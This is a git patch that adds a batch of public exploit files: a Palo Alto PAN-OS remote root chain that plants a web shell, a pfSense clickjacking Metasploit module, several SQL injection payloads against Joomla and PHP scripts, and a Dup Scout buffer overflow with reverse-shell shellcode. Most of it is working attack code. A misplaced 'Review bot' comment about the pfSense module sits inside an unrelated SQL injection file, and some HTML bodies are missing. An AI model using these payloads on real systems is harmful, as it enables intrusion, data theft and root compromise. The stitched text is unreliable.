From ed1c4edf3e49e20f299f34a916b7d5601197256b Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 15 Dec 2017 05:02:23 +0000 Subject: [PATCH] DB: 2017-12-15 13 changes to exploits/shellcodes Dup Scout Enterprise 10.0.18 - 'Input Directory' Local Buffer Overflow (SEH) Microsoft Office - DDE Payload Delivery (Metasploit) Dup Scout Enterprise - Login Buffer Overflow (Metasploit) pfSense 2.4.1 - CSRF Error Page Clickjacking (Metasploit) Palo Alto Networks Firewalls - Remote root Code Execution Joomla! Component JEXTN Question And Answer 3.1.0 - SQL Injection Joomla! Component JEXTN Video Gallery 3.0.5 - 'id' SQL Injection Readymade Video Sharing Script 3.2 - HTML Injection Paid To Read Script 2.0.5 - 'uid' / 'fnum' / 'fn' SQL Injection FS Lynda Clone 1.0 - SQL Injection Bus Booking Script 1.0 - 'txtname' SQL Injection Piwigo 2.9.1 - 'cat_true' / 'cat_false' SQL Injection Advantech WebAccess 8.2-2017.03.31 - Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit) --- exploits/hardware/remote/43342.txt | 234 +++++++++++++++++++++++++++++ exploits/php/remote/43341.rb | 153 +++++++++++++++++++ exploits/php/webapps/43329.txt | 36 +++++ exploits/php/webapps/43330.txt | 27 ++++ exploits/php/webapps/43333.txt | 26 ++++ exploits/php/webapps/43334.txt | 39 +++++ exploits/php/webapps/43335.html | 29 ++++ exploits/php/webapps/43336.html | 29 ++++ exploits/php/webapps/43337.txt | 40 +++++ exploits/windows/remote/43202.py | 153 +++++++++++++++++++ exploits/windows/remote/43338.rb | 157 +++++++++++++++++++ exploits/windows/remote/43339.rb | 101 +++++++++++++ exploits/windows/webapps/43340.rb | 141 +++++++++++++++++ files_exploits.csv | 13 ++ 14 files changed, 1178 insertions(+) create mode 100644 exploits/hardware/remote/43342.txt create mode 100755 exploits/php/remote/43341.rb create mode 100644 exploits/php/webapps/43329.txt create mode 100644 exploits/php/webapps/43330.txt create mode 100644 exploits/php/webapps/43333.txt create mode 100644 exploits/php/webapps/43334.txt create mode 100644 exploits/php/webapps/43335.html create mode 
100644 exploits/php/webapps/43336.html create mode 100644 exploits/php/webapps/43337.txt create mode 100755 exploits/windows/remote/43202.py create mode 100755 exploits/windows/remote/43338.rb create mode 100755 exploits/windows/remote/43339.rb create mode 100755 exploits/windows/webapps/43340.rb diff --git a/exploits/hardware/remote/43342.txt b/exploits/hardware/remote/43342.txt new file mode 100644 index 000000000..09e7a1832 --- /dev/null +++ b/exploits/hardware/remote/43342.txt 
@@ -0,0 +1,234 @@ +This is a public advisory for CVE-2017-15944 which is a remote root code +execution bug in Palo Alto Networks firewalls. + +Three separate bugs can be used together to remotely execute commands as +root through the web management interface without authentication on: PAN-OS +6.1.18 and earlier, PAN-OS 7.0.18 and earlier, PAN-OS 7.1.13 and earlier, +PAN-OS 8.0.5 and earlier. + +Palo Alto Networks recommends not exposing the web management interface to +the internet. By looking at Project Sonar or Shodan it is evident that it's +actually quite common to deploy the firewalls with the web management +interface listening on the WAN port. + +PAN-OS 6.1.19, PAN-OS 7.0.19, PAN-OS 7.1.14 and PAN-OS 8.0.6 are patched +and can be downloaded from https://support.paloaltonetworks.com/ + +=*=*=*=*=*=*=*=*= TIMELINE + +2017-07-09: Report submitted. + +2017-07-11: Palo Alto Networks PSIRT confirm that they received the report +and assign PDV-348 for tracking the issues. + +2017-12-05: The bugs are made public by Palo Alto Networks at +https://securityadvisories.paloaltonetworks.com + +2017-12-11: I send out this public advisory. + +=*=*=*=*=*=*=*=*= DESCRIPTION + +- Bug #1: Partial authentication bypass + +The file `/etc/appweb3/conf/common.conf` contains the web configuration for +the web server that handles the web management interface. + +It configures an authentication filter on most subdirectories using the +following format: + + + panAuthCheck on + + +This means that all requests to /php/* will be checked for an authenticated +session cookie. The functionality itself is implemented in the +`libpanApiWgetFilter.so` library file. + +The function `openAuthFilter()` will look for the PHPSESSID cookie and then +call the `readSessionVarsFromFile()` function on the session file to +extract the `dloc` and `user` values. 
+ +The problem is that `readSessionVarsFromFile()` is not using the official +PHP functions to read the serialized session data, but its own parser using +`strtok()` which is not implemented correctly. + +The PHP session format which `readSessionVarsFromFile()` tries to parse +looks like this for string values: +locale|s:2:"en"; + +Explained: +var_name|s:str_length:"string value"; var_name|s:str_length:"another +string";... + + +If we can inject a value into the session file that contains the `";` +character sequence, we can break the parser and inject our own value for +the `user` variable. + +We can do this by calling the `/esp/cms_changeDeviceContext.esp` script, +which does not need any kind of authentication to be called. + +It will call the `panUserSetDeviceLocation()` function located in +`panmodule.so`, which splits the `dloc` GET parameter by ":" and sets the +`dloc` and `loc` session variables to the second value. + +We can corrupt the session file by calling the following url: +`/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";` + +Which produces the following contents in `/tmp/sess_`: +`dloc|s:20:"8:a'";user|s."1337";";loc|s:27:"16:a'";user|s."1337";:vsys1";` + +When this is parsed by the `readSessionVarsFromFile()` function, it will +extract `16:a'` as the value for the `user` variable. + +It will then use this in XML requests to the backend to check if the user +is authenticated, but this produces an XML injection that results in an +invalid XML document: + +``` +Entity: line 1: parser error : attributes construct error + +``` + +The extra single quote character is injected into the cookie value, which +makes the request fail because of a parser error. Interestingly enough, the +`panCheckSessionExpired()` function in `libpanApiWgetFilter.so` does not +recognize this unexpected state and believes that authentication has +succeeded. 
+ +We can now access any PHP file protected by the panAuthCheck directive +using our manipulated session cookie. + +Example: + +imac:~/pa% curl -H "Cookie: PHPSESSID=hacked;" 10.0.0.1/php/utils/debug.php + +Moved Temporarily +

Moved Temporarily

+

The document has moved here.

+
PanWeb Server/ - at 127.0.0.1:28250 Port 80
+ +imac:~/pa% curl -H "Cookie: PHPSESSID=hacked;" ' +10.0.0.1/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";' +@start@Success@end@ +imac:~/pa% curl -H "Cookie: PHPSESSID=hacked;" 10.0.0.1/php/utils/debug.php +2>/dev/null|head -30 + + + + + Debug Console + + +It's important to note that we still don't have a valid, logged in session. +Most PHP scripts will fail, but we do bypass the authentication check in +the web server. + +- Bug #2: Arbitrary directory creation + +The `/php/utils/router.php` file handles API requests for the web +management interface backend communication. It exposes most of the PHP +classes that comprise the web application in a simple remote procedure call +interface over HTTP POST/JSON. + +The `/php/device/Administrator.php` file declares the `Administrator` +class. It contains a method called `get` that we can call from `router.php`. + +In the `get` method there is an XML injection in the call to +`Direct::getConfigByXpath`. The `jsonArgs->id` parameter is appended to the +request without any sanitation. This allows us to manipulate the XML +request that is sent to the backend. + +Normal request: + + +We can inject our own values into the end of the `obj` attribute, and +therefore control all of the remaining XML request. + +The `pan_cfg_req_ctxt_construct()` function in `libpanmp_mp.so` handles the +parsing of XML requests in the backend. + +If we send a request tag with the `async-mode='yes'` attribute set, the +backend will create a temporary file and parent directory in +`/opt/pancfg/session/pan/user_tmp//.xml` that contains +the output of the request. + +Since we can control the `` part of the created directory +structure, we can use a directory traversal attack to create a directory +with an arbitrary name anywhere on the system. 
+ +For example, by sending the following crafted POST request: + +{"action":"PanDirect","method":"execute","data": +["07c5807d0d927dcd0980f86024e5208b","Administrator.get", +{"changeMyPassword":true,"template":"asd","id":"admin']\" +async-mode='yes' refresh='yes' +cookie='../../../../../../tmp/hacked'/>\u0000"}],"type":"rpc","tid":713} + + +The backend receives the following XML request, resulting in the +`/tmp/hacked` directory being created: + + + + +- Bug #3: Command injection in cron script + +There is a cron entry that executes `/usr/local/bin/genindex_batch.sh` +every 15 minutes. + +This shellscript will in turn execute `/usr/local/bin/genindex.sh` to +generate indexes from database files in `/opt/pancfg/mgmt/logdb/`. + +There is a command injection vulnerability in how this shellscript handles +filename processing: + + + +Since we can create directories in `$PAN_BASE_DIR/logdb/$dir/1`, we are +able to influence the output of the first `find` command. + +This output is then used as an argument in the second execution of `find`, +but without enclosing quotes. We can therefore inject arbitrary arguments +in this invocation. By passing the `-exec` option to `find`, we can make it +execute arbitrary system commands. + +My exploit creates a directory called: +`* -print -exec python -c exec("[base64 code..]".decode("base64")) ;` + +The base64-encoded python code will be executed as root, which creates a +simple web shell in `/var/appweb/htdocs/api/c.php` as well as a suid root +wrapper in `/bin/x`. + +=*=*=*=*=*=*=*=*= EXPLOIT OUTPUT + +imac:~/pa% python panos-rce.py http://10.0.0.1/ +creating corrupted session... +http://10.0.0.1/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27 +";user|s."1337"; +done, verifying.. +http://10.0.0.1/php/utils/debug.php +panAuthCheck bypassed +verifying that directory creation works.. 
+http://10.0.0.1/php/utils/router.php/Administrator.get +http://10.0.0.1/api/test/202.xml +creating /opt/pancfg/mgmt/logdb/traffic/1/ entry +shell at http://10.0.0.1/api/c.php should be created in 8 minutes.. please +wait + +web shell created, rootshell accessible with /bin/x -p -c 'command' +uid=99(nobody) gid=99(nobody) euid=0(root) +Linux PA-3060 2.6.32.27-7.1.10.0.30 #1 SMP Thu May 4 20:10:01 PDT 2017 +x86_64 x86_64 x86_64 GNU/Linux + +$ + + +=*=*=*=*=*=*=*=*= CREDIT + +Philip Pettersson \ No newline at end of file diff --git a/exploits/php/remote/43341.rb b/exploits/php/remote/43341.rb new file mode 100755 index 000000000..bbb7294dd --- /dev/null +++ b/exploits/php/remote/43341.rb 
@@ -0,0 +1,153 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Clickjacking Vulnerability In CSRF Error Page pfSense',
+ 'Description' => %q{
+ This module exploits a Clickjacking vulnerability in pfSense <= 2.4.1.
+
+ pfSense is a free and open source firewall and router. It was found that the
+ pfSense WebGUI is vulnerable to Clickjacking. By tricking an authenticated admin
+ into interacting with a specially crafted webpage it is possible for an attacker
+ to execute arbitrary code in the WebGUI. Since the WebGUI runs as the root user,
+ this will result in a full compromise of the pfSense instance.
+ },
+ 'Author' => 'Yorick Koster',
+ 'Payload' => { 'BadChars' => '"' },
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['URL', 'https://securify.nl/en/advisory/SFY20171101/clickjacking-vulnerability-in-csrf-error-page-pfsense.html'],
+ ['URL', 'https://doc.pfsense.org/index.php/2.4.2_New_Features_and_Changes']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process'
+ },
+ 'Arch' => ARCH_PHP,
+ 'Platform' => 'php',
+ 'Targets' =>
+ [
+ [ 'pfSense <= 2.4.1', { 'auto' => false } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Nov 21 2017'
+ )
+ )
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path to the web application', 'https://192.168.1.1'])
+ ]
+ )
+ end
+
+ def js_file
+ @js ||= lambda {
+ path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'cookieconsent.min.js')
+ return File.read(path)
+ }.call
+ end
+
+ def css_file
+ @css ||= lambda {
+ path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'cookieconsent.min.css')
+ return File.read(path)
+ }.call
+ end
+
+ def background_file
+ @background ||= lambda { + path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'background.jpg') + return File.read(path) + }.call + end + + def on_request_uri(cli, request) + print_status("GET #{request.uri} #{request.headers['User-Agent']}") + + resp = create_response(200, "OK") + if request.uri =~ /\.js$/ + resp.body = js_file + resp['Content-Type'] = 'text/javascript' + + elsif request.uri =~ /\.css$/ + resp.body = css_file + resp['Content-Type'] = 'text/css' + + elsif request.uri =~ /\.jpg$/ + resp.body = background_file + resp['Content-Type'] = 'image/jpg' + + else + if datastore['TARGETURI'].end_with? '/' + url = datastore['TARGETURI'] + 'diag_command.php' + else + url = datastore['TARGETURI'] + '/diag_command.php' + end + framename = rand_text_alpha(16) + divname = rand_text_alpha(16) + resp.body = %Q| + + + + + + + +
+ +
+
+
+ + + +
+
+ + +| + resp['Content-Type'] = 'text/html' + end + + cli.send_response(resp) + end +end \ No newline at end of file diff --git a/exploits/php/webapps/43329.txt b/exploits/php/webapps/43329.txt new file mode 100644 index 000000000..372153464 --- /dev/null +++ b/exploits/php/webapps/43329.txt @@ -0,0 +1,36 @@ +# # # # # +# Exploit Title: Joomla! Component JEXTN Question And Answer 3.1.0 - SQL Injection +# Dork: N/A +# Date: 13.12.2017 +# Vendor Homepage: http://jextn.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/communication/question-a-answers/jextn-question-and-answer/ +# Version: 3.1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/index.php/en/component/jequestions/?view=tags&an=[SQL] +# +# %2dVerAyari'%20%2f*!06666UNION*%2f%20%2f*!06666SELECT*/%201%2c(SELECT%20GROUP_CONCAT(table_name%20SEPARATOR%200x3c62723e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_SCHEMA=DATABASE())%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%2c16%2c17%2c18%2c19%2c20%2c21%2c22%2c23%2c24%2c25%2d%2d%20%2d +# +# +# 2) +# +# +#
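Review bot: The `.jpg` branch of `on_request_uri` sets `resp['Content-Type'] = 'image/jpg'`, which is not a registered media type; the correct value is `resp['Content-Type'] = 'image/jpeg'` (browsers sniff the bytes, which is why the typo goes unnoticed). The `TARGETURI` option is described as 'The base path to the web application' yet its default `https://192.168.1.1` is a full URL that the `else` branch joins with `diag_command.php`; the option text should say it is the full base URL of the pfSense WebGUI, since Metasploit's `TARGETURI` normally holds only a path. The three `@js ||= lambda { ... }.call` memoizers in `js_file`, `css_file` and `background_file` can be plain `@js ||= File.read(File.join(...))`; the lambda wrapper only obscures a one-line intent. The HTML body inside the `%Q| ... |` literal is not legible in this rendering, so it is not reviewed here.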
+# +# +#
+# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43330.txt b/exploits/php/webapps/43330.txt new file mode 100644 index 000000000..ae3855e7a --- /dev/null +++ b/exploits/php/webapps/43330.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Joomla! Component JEXTN Video Gallery 3.0.5 - SQL Injection +# Dork: N/A +# Date: 13.12.2017 +# Vendor Homepage: http://jextn.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/jextn-video-gallery/ +# Version: 3.0.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/index.php?option=com_jevideogallery&view=category&id=99[SQL] +# +# 99%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(DATABASE()%20AS%20CHAR)%2c0x7e,0x496873616e53656e63616e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a) +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43333.txt b/exploits/php/webapps/43333.txt new file mode 100644 index 000000000..4dd19078d --- /dev/null +++ b/exploits/php/webapps/43333.txt 
@@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Readymade Video Sharing Script 3.2 - HTML Injection +# Dork: N/A +# Date: 13.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/ +# Demo: http://www.smsemailmarketing.in/demo/videosharing/ +# Version: 3.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-17649 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability implication allows an attacker to inject html code .... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/single-video-detail.php?video_id=MTMy&comment=[CODE]&comment_submit= +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43334.txt b/exploits/php/webapps/43334.txt new file mode 100644 index 000000000..abc944b27 --- /dev/null +++ b/exploits/php/webapps/43334.txt 
@@ -0,0 +1,39 @@ +# # # # # +# Exploit Title: Paid To Read Script 2.0.5 - SQL Injection +# Dork: N/A +# Date: 13.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/paid-to-read-script/ +# Version: 2.0.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-17651 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/admin/userview.php?uid=[SQL] +# +# -9++/*!08888UNION*/(/*!08888SELECT*/(1)%2c(2)%2c(3)%2c(4)%2c(5)%2c(6)%2c(7)%2c(8)%2c(9)%2c(10)%2c(11)%2c(12)%2c(13)%2c(14)%2c(15)%2c(16)%2c(17)%2c(18)%2c(19)%2c(20)%2c(21)%2c(22)%2c(23)%2c(24)%2c(25)%2c(26)%2c(27)%2c(28)%2c(29)%2c(30)%2c(31)%2c(32)%2c(33)%2c(34)%2c(35)%2c(36)%2c(37)%2c(38)%2c(39)%2c(40)%2c(41)%2c(42)%2c(43)%2c(44)%2c(45)%2c(46)%2c(47)%2c(48)%2c(/*!08888Select*/+export_set(5%2c@:=0%2c(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5%2cexport_set(5%2c@%2c/*!08888table_name*/%2c0x3c6c693e%2c2)%2c/*!08888column_name*/%2c0xa3a%2c2))%2c@%2c2))%2c(50)%2c(51)%2c(52)%2c(53)%2c(54)%2c(55)%2c(56)%2c(57)%2c(58)%2c(59)%2c(60)%2c(61)%2c(62)%2c(63)%2c(64)%2c(65)%2c(66)%2c(67)%2c(68))--+- +# +# +# 2) +# http://localhost/[PATH]/admin/viewemcamp.php?fnum=[SQL] +# +# -1++/*!08888UNION*/(/*!08888SELECT*/+0x253238253331253239%2cCONCAT_WS(0x203a20%2cUSER()%2cDATABASE()%2cVERSION())%2c0x253238253333253239%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239)--+- +# +# +# 3) +# http://localhost/[PATH]/admin/viewvisitcamp.php?fn=[SQL] +# +# 
-6++/*!50000UNION*/(/*!50000SELECT*/0x253238253331253239%2c0x253238253332253239%2c0x253238253333253239%2c0x253238253334253239%2cCONCAT_WS(0x203a20%2cUSER()%2cDATABASE()%2cVERSION())%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239%2c0x253238253331253333253239%2c0x253238253331253334253239)--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43335.html b/exploits/php/webapps/43335.html new file mode 100644 index 000000000..cb54caf1a --- /dev/null +++ b/exploits/php/webapps/43335.html @@ -0,0 +1,29 @@ + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/43336.html b/exploits/php/webapps/43336.html new file mode 100644 index 000000000..292e89baa --- /dev/null +++ b/exploits/php/webapps/43336.html @@ -0,0 +1,29 @@ + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/43337.txt b/exploits/php/webapps/43337.txt new file mode 100644 index 000000000..95ab215d9 --- /dev/null +++ b/exploits/php/webapps/43337.txt @@ -0,0 +1,40 @@ +# # # # # +# Exploit Title: Piwigo <= 2.9.1 - 'cat_true'/'cat_false' SQL Injection +# Dork: N/A +# Date: 12.12.2017 +# Vendor Homepage: http://piwigo.org/ +# Software Link: http://piwigo.org/basics/downloads +# Version: <= 2.9.1 +# Category: Webapps +# Tested on: WiN7_x64/WIN10_X64 +# CVE: CVE-2017-10682 +# # # # # +# Exploit Author: Akityo +# Email: akityo@foxmail.com +# # # # # +# Description: +# +# SQL injection vulnerability in the administrative backend in Piwigo through 2.9.1 allows remote users to execute arbitrary SQL commands via the cat_false or cat_true parameter +# in the comments or status page to cat_options.php. +# +# +# # # # # +# Proof-of-Concent: +# +# POST /[path]/admin.php?page=cat_options§ion=status HTTP/1.1 +# Host: www.test.com +# Content-Length: 34 +# Cache-Control: max-age=0 +# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +# Upgrade-Insecure-Requests: 1 +# User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 +# Content-Type: application/x-www-form-urlencoded +# Accept-Encoding: gzip, deflate +# Accept-Language: zh-CN,zh;q=0.8 +# Cookie: null +# Connection: close +# +# cat_false%5B%5D=[payload here]&trueify=%C2%AB +# +# +# # # # # \ No newline at end of file diff --git a/exploits/windows/remote/43202.py b/exploits/windows/remote/43202.py new file mode 100755 index 000000000..cf413319f --- /dev/null +++ b/exploits/windows/remote/43202.py 
@@ -0,0 +1,153 @@ +#!/usr/bin/python +import struct + +######################################################################################################## +# Exploit Author: Miguel Mendez Z +# Exploit Title: Dup Scout Enterprise v10.0.18 "Input Directory" Local Buffer Overflow - SEH Unicode +# Date: 29-11-2017 +# Software: Dup Scout Enterprise +# Version: v10.0.18 +# Vendor Homepage: http://www.dupscout.com +# Software Link: http://www.dupscout.com/setups/dupscoutent_setup_v10.0.18.exe +# Tested on: Windows 7 x86 +######################################################################################################## + + +''' +[+] Paso 1 +Bytes Validos: +\x21\x23\x2a\x2b\x2d\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a +\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f +\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x61\x62\x63\x64\x65 +\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75 +\x76\x77\x78\x79\x7a +---------- +[+] Paso 2: +Align ESP: +popad * 49 +---------- +[+] Paso 3: +Assembly Align EAX: +xor eax,eax +push esp +pop eax +pop ecx +add eax 1c +jmp eax -----> (inicio shellcode) +---------- +[+] Paso 4: +Codificacion: +and eax,554E4D4A +and eax,2A313235 +sub eax,65656565 +sub eax,65654C65 +sub eax,54363176 +push eax +sub eax,33354D35 +sub eax,2A707737 +push eax + +Byte Paste: +254A4D4E55253532312A2D656565652D654C65652D76313654502D354D35332D3777702A50 +''' + +popad = "\x61"*49 +alignEsp = popad+( + "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31" + "\x2A\x2D\x65\x65\x65\x65\x2D\x65\x4C" + "\x65\x65\x2D\x76\x31\x36\x54\x50\x2D" + "\x35\x4D\x35\x33\x2D\x37\x77\x70\x2A" + "\x50" + ) + +''' +msfvenom -p windows/exec CMD=calc > calc.raw && ./alpha2 eax < calc.raw) +msfvenom -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -f python +''' +shellcodeTest = ( + "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8A" + "BuJIylIxNbWpwpwpQpMYyup1kp3TNk0PTpLKPRflLKv2uDnk" + "42uxtOoGaZwVea9oNLGL3QCLtBFLUpo1zoVmgqKwKRxrrrrw" + 
"LK62tPLKBjUlnk0LdQBXJCPHEQHQRqlK0YepwqN3lKRivxKS" + "wJaYLKTtLKvaXVvQKOLlKqhO6meQkw4xkP1ekFESqmxxWKam" + "7TBUKTBxNkchgTfaN3PfNkDLRklKshuLc1n3nk6dNk7qJpNi" + "QT14Q4aKSkSQV91JF1KOKPqO1O2zLKfrxknmqMrJS1LMNeoB" + "Wpgp5PpP58VQNk2Oow9oXUoKxpNUoRrvU8oVoeoMMMKOxUWL" + "eV3L4JMPKKKPrUTEoKswtSRRROcZePrsKOZu3SSQPlPcePA" + ) + +#msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/alpha_mixed BufferRegister=EAX -f python +shellcode = "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" +shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" +shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +shellcode += "\x4b\x4c\x79\x78\x6f\x72\x57\x70\x77\x70\x55\x50\x45" +shellcode += "\x30\x4d\x59\x49\x75\x46\x51\x4b\x70\x55\x34\x6e\x6b" +shellcode += "\x70\x50\x30\x30\x4e\x6b\x56\x32\x46\x6c\x6c\x4b\x66" +shellcode += "\x32\x46\x74\x6e\x6b\x62\x52\x44\x68\x34\x4f\x4f\x47" +shellcode += "\x73\x7a\x45\x76\x55\x61\x39\x6f\x4c\x6c\x47\x4c\x35" +shellcode += "\x31\x53\x4c\x35\x52\x44\x6c\x65\x70\x5a\x61\x58\x4f" +shellcode += "\x74\x4d\x45\x51\x6a\x67\x48\x62\x4b\x42\x46\x32\x62" +shellcode += "\x77\x4e\x6b\x51\x42\x62\x30\x4c\x4b\x70\x4a\x37\x4c" +shellcode += "\x6e\x6b\x32\x6c\x74\x51\x33\x48\x6a\x43\x71\x58\x66" +shellcode += "\x61\x6a\x71\x50\x51\x4e\x6b\x63\x69\x75\x70\x37\x71" +shellcode += "\x7a\x73\x4c\x4b\x52\x69\x45\x48\x58\x63\x54\x7a\x30" +shellcode += "\x49\x6e\x6b\x34\x74\x4e\x6b\x56\x61\x49\x46\x34\x71" +shellcode += "\x69\x6f\x4e\x4c\x6f\x31\x78\x4f\x54\x4d\x66\x61\x68" +shellcode += "\x47\x76\x58\x6d\x30\x72\x55\x48\x76\x74\x43\x63\x4d" +shellcode += "\x48\x78\x65\x6b\x31\x6d\x74\x64\x42\x55\x58\x64\x31" +shellcode += "\x48\x6c\x4b\x53\x68\x47\x54\x37\x71\x39\x43\x73\x56" +shellcode += "\x4e\x6b\x66\x6c\x72\x6b\x6c\x4b\x36\x38\x35\x4c\x43" +shellcode += "\x31\x38\x53\x6c\x4b\x35\x54\x4c\x4b\x67\x71\x58\x50" +shellcode += 
"\x4c\x49\x72\x64\x75\x74\x66\x44\x43\x6b\x63\x6b\x31" +shellcode += "\x71\x46\x39\x32\x7a\x32\x71\x79\x6f\x6b\x50\x43\x6f" +shellcode += "\x31\x4f\x50\x5a\x4c\x4b\x52\x32\x48\x6b\x6e\x6d\x31" +shellcode += "\x4d\x45\x38\x55\x63\x74\x72\x33\x30\x47\x70\x53\x58" +shellcode += "\x43\x47\x74\x33\x47\x42\x31\x4f\x63\x64\x70\x68\x62" +shellcode += "\x6c\x62\x57\x74\x66\x43\x37\x59\x6f\x58\x55\x4d\x68" +shellcode += "\x6e\x70\x55\x51\x33\x30\x53\x30\x55\x79\x59\x54\x53" +shellcode += "\x64\x56\x30\x53\x58\x56\x49\x4f\x70\x30\x6b\x33\x30" +shellcode += "\x49\x6f\x4a\x75\x62\x70\x66\x30\x72\x70\x42\x70\x51" +shellcode += "\x50\x52\x70\x71\x50\x46\x30\x53\x58\x58\x6a\x36\x6f" +shellcode += "\x79\x4f\x4b\x50\x59\x6f\x6e\x35\x6e\x77\x61\x7a\x56" +shellcode += "\x65\x72\x48\x71\x6f\x75\x50\x45\x50\x46\x61\x63\x58" +shellcode += "\x53\x32\x37\x70\x56\x65\x47\x49\x6f\x79\x4a\x46\x53" +shellcode += "\x5a\x74\x50\x66\x36\x33\x67\x50\x68\x6e\x79\x6e\x45" +shellcode += "\x54\x34\x31\x71\x6b\x4f\x78\x55\x4f\x75\x6f\x30\x64" +shellcode += "\x34\x56\x6c\x49\x6f\x50\x4e\x36\x68\x64\x35\x58\x6c" +shellcode += "\x43\x58\x6c\x30\x6f\x45\x4c\x62\x30\x56\x39\x6f\x59" +shellcode += "\x45\x35\x38\x73\x53\x70\x6d\x35\x34\x45\x50\x6e\x69" +shellcode += "\x49\x73\x70\x57\x56\x37\x73\x67\x56\x51\x39\x66\x31" +shellcode += "\x7a\x75\x42\x36\x39\x36\x36\x58\x62\x39\x6d\x31\x76" +shellcode += "\x49\x57\x52\x64\x46\x44\x75\x6c\x53\x31\x63\x31\x6e" +shellcode += "\x6d\x31\x54\x57\x54\x42\x30\x5a\x66\x35\x50\x62\x64" +shellcode += "\x30\x54\x42\x70\x76\x36\x33\x66\x30\x56\x31\x56\x71" +shellcode += "\x46\x50\x4e\x56\x36\x66\x36\x32\x73\x31\x46\x45\x38" +shellcode += "\x33\x49\x5a\x6c\x77\x4f\x6f\x76\x4b\x4f\x58\x55\x6d" +shellcode += "\x59\x4d\x30\x42\x6e\x53\x66\x33\x76\x59\x6f\x66\x50" +shellcode += "\x63\x58\x66\x68\x6d\x57\x77\x6d\x31\x70\x39\x6f\x49" 